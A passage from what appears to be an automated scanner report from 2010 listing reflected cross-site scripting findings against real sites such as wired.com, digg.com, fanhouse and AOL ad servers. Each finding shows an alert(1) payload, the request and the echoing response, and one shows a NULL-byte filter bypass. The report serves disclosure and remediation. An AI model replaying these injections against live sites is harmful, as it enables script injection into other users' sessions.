Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0b7d3d"><script>alert(1)</script>c653d13393c/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.91. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd1bb"><script>alert(1)</script>795dc3822fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1fd1bb"><script>alert(1)</script>795dc3822fb/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1fd1bb"><script>alert(1)</script>795dc3822fb/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.92. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b81"><script>alert(1)</script>d7b136c3cd7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794d3b81"><script>alert(1)</script>d7b136c3cd7/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794d3b81"><script>alert(1)</script>d7b136c3cd7/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.93. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc8ef"><script>alert(1)</script>2480ed798e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0cc8ef"><script>alert(1)</script>2480ed798e2/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0cc8ef"><script>alert(1)</script>2480ed798e2/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.94. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0eb1"><script>alert(1)</script>6026b3de44a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1e0eb1"><script>alert(1)</script>6026b3de44a/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1e0eb1"><script>alert(1)</script>6026b3de44a/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.95. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee20a"><script>alert(1)</script>b927cf1665f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/sizeee20a"><script>alert(1)</script>b927cf1665f=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/sizeee20a"><script>alert(1)</script>b927cf1665f=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.96. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc670"><script>alert(1)</script>e55e2aeba0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956&fc670"><script>alert(1)</script>e55e2aeba0c=1 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 353

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956&fc670"><script>alert(1)</script>e55e2aeba0c=1;adiframe=y">
...[SNIP]...

1.97. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ed98"><script>alert(1)</script>b265eeb37a0 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=3815709563ed98"><script>alert(1)</script>b265eeb37a0 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=3815709563ed98"><script>alert(1)</script>b265eeb37a0;adiframe=y">
...[SNIP]...

1.98. http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boxing.fanhouse.com
Path:   /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96dad"-alert(1)-"01208aaeb95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?96dad"-alert(1)-"01208aaeb95=1 HTTP/1.1
Host: boxing.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:39:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sun, 22-Nov-2009 01:39:25 GMT; path=/
Keep-Alive: timeout=5, max=999965
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 119988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
xgo = true;
s_265.prop1="Boxing";
s_265.prop2="Article";
s_265.prop9="bsd:19654671";
s_265.prop12="http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?96dad"-alert(1)-"01208aaeb95=1";
s_265.prop17="pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma";
s_265.prop19="lem-satterfield";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code
...[SNIP]...

1.99. http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boxing.fanhouse.com
Path:   /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6954"><script>alert(1)</script>40c64d26d0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?f6954"><script>alert(1)</script>40c64d26d0b=1 HTTP/1.1
Host: boxing.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:39:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sun, 22-Nov-2009 01:39:16 GMT; path=/
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 120062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?f6954"><script>alert(1)</script>40c64d26d0b=1"/>
...[SNIP]...

1.100. http://cde.cerosmedia.com/WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cde.cerosmedia.com
Path:   /WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bdf</script><script>alert(1)</script>fbf4f8394ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde?74bdf</script><script>alert(1)</script>fbf4f8394ac=1 HTTP/1.1
Host: cde.cerosmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:52:51 GMT
Server: Apache
Set-Cookie: CerosStats=aWR8ZGExNDc5NmJkM2Y1N2EyZDVjMDA0MTY5OGE3YzU5NGQ%3D; expires=Thu, 19-Nov-2020 01:52:51 GMT; path=/; domain=.cerosmedia.com
Content-Length: 7488
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
               
       <meta h
...[SNIP]...
osmedia.com%2FWIRED_MAY_SAMPLER%2F1S4bb37141d5ff4012.cde%2Fpage%2F"); so.addVariable("pathToXML", "pages%2FWIR_260310%2Fxml%2Frhino.xml%3Fcb%3D6246e1bbae81f8201d17e74c48200238"); so.addVariable("ceros_74bdf</script><script>alert(1)</script>fbf4f8394ac", "1"); so.addParam("scale", "noscale"); so.addParam("allowScriptAccess", "always"); so.addParam("swLiveConnect", "true"); so.write("flashcontent"); /* ]]>
...[SNIP]...

1.101. http://click.linksynergy.com/fs-bin/click [offerid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://click.linksynergy.com
Path:   /fs-bin/click

Issue detail

The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload 12c1f<script>alert(1)</script>7027a7ea3c was submitted in the offerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs-bin/click?id=/1Vwg7V501c&subid=&offerid=12c1f<script>alert(1)</script>7027a7ea3c&type=10&tmpid=3909&RD_PARM1=http://itunes.apple.com/us/app/wired-magazine/id373903654%3fmt=8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.wired.com/magazine/?intcid=gnav
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: click.linksynergy.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 257
Date: Mon, 22 Nov 2010 01:34:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Bad number format in offerid: For input string: "12c1f<script>alert(1)</script>7027a7ea3c"
</body>
...[SNIP]...

1.102. http://comments.wired.com/json.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comments.wired.com
Path:   /json.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cdaef<script>alert(1)</script>0e666a83707 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json.js?url=%2Fculture%2Fart%2Fmultimedia%2F2008%2F07%2Fgallery_faves_food&uid=&offset=0&callback=commentBroker.handleEventcdaef<script>alert(1)</script>0e666a83707&eventName=comments_0&markdown=true&limit=10 HTTP/1.1
Host: comments.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Server: Spezserver/0.1
Vary: Accept-Encoding
X-N: S
Date: Mon, 22 Nov 2010 01:40:43 GMT
Connection: close
Content-Length: 3429

commentBroker.handleEventcdaef<script>alert(1)</script>0e666a83707("%7B%22success%22%3A%20true%2C%20%22hash%22%3A%20%22%22%2C%20%22type%22%3A%20%22responseWrapper%22%2C%20%22responses%22%3A%20%5B%7B%22commentEndIdx%22%3A%2011%2C%20%22pageNum%22%3A%200%2C%20%22comment
...[SNIP]...

1.103. http://comments.wired.com/json.js [eventName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comments.wired.com
Path:   /json.js

Issue detail

The value of the eventName request parameter is copied into the HTML document as plain text between tags. The payload c37f4<script>alert(1)</script>76a0335a7e3 was submitted in the eventName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json.js?url=%2Fculture%2Fart%2Fmultimedia%2F2008%2F07%2Fgallery_faves_food&uid=&offset=0&callback=commentBroker.handleEvent&eventName=comments_0c37f4<script>alert(1)</script>76a0335a7e3&markdown=true&limit=10 HTTP/1.1
Host: comments.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Server: Spezserver/0.1
Vary: Accept-Encoding
X-N: S
Date: Mon, 22 Nov 2010 01:40:48 GMT
Connection: close
Content-Length: 3429

commentBroker.handleEvent("%7B%22success%22%3A%20true%2C%20%22hash%22%3A%20%22%22%2C%20%22type%22%3A%20%22responseWrapper%22%2C%20%22responses%22%3A%20%5B%7B%22commentEndIdx%22%3A%2011%2C%20%22pageNum
...[SNIP]...
2%3A%20%22/culture/art/multimedia/2008/07/gallery_faves_food%22%2C%20%22type%22%3A%20%22document%22%7D%2C%20%22type%22%3A%20%22commentPage%22%7D%5D%2C%20%22statusMessage%22%3A%20%22%22%7D", "comments_0c37f4<script>alert(1)</script>76a0335a7e3");

1.104. http://digg.com/tools/diggthis.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007fc71"><script>alert(1)</script>f888a9f8a9b was submitted in the REST URL parameter 1. This input was echoed as 7fc71"><script>alert(1)</script>f888a9f8a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools%007fc71"><script>alert(1)</script>f888a9f8a9b/diggthis.js HTTP/1.1
Accept: */*
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: digg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2233503940199055809%3A136; expires=Tue, 21-Dec-2010 20:21:32 GMT; path=/; domain=digg.com
Set-Cookie: d=cbb3a58acc522768ca90b50d410773b05e71e4a4425c0014e669d73756b805c5; expires=Sat, 21-Nov-2020 06:29:12 GMT; path=/; domain=.digg.com
X-Digg-Time: D=237512 10.2.128.255
Vary: Accept-Encoding
nnCoection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15352

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools%007fc71"><script>alert(1)</script>f888a9f8a9b/diggthis.js.rss">
...[SNIP]...

1.105. http://digg.com/tools/diggthis.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dc217"><script>alert(1)</script>304ac110a42 was submitted in the REST URL parameter 2. This input was echoed as dc217"><script>alert(1)</script>304ac110a42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools/diggthis.js%00dc217"><script>alert(1)</script>304ac110a42 HTTP/1.1
Accept: */*
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: digg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:21:34 GMT
Server: Apache
